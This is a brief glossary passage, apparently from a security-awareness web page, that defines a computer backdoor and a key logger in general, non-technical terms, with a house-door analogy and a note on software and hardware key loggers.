Backdoor - A backdoor is a point of access to a computer that
does not require authentication. An unlocked house back door
gives access to an otherwise secure  home;  a computer
backdoor allows access to your PC without your knowledge or
permission.
Key logger – Key loggers are used to monitor keyboard activity
on a PC. These can be software-based (bundled with Trojan
horses, adware, and spyware) or hardware-based (between the
keyboard cable and the  PC, acoustic etc.) Usually this
information is retrieved across a local network, the internet, or
from the physical device connected to the keyboard.
Read More ->>
DMCA.com Protected by Copyscape Online Plagiarism Tool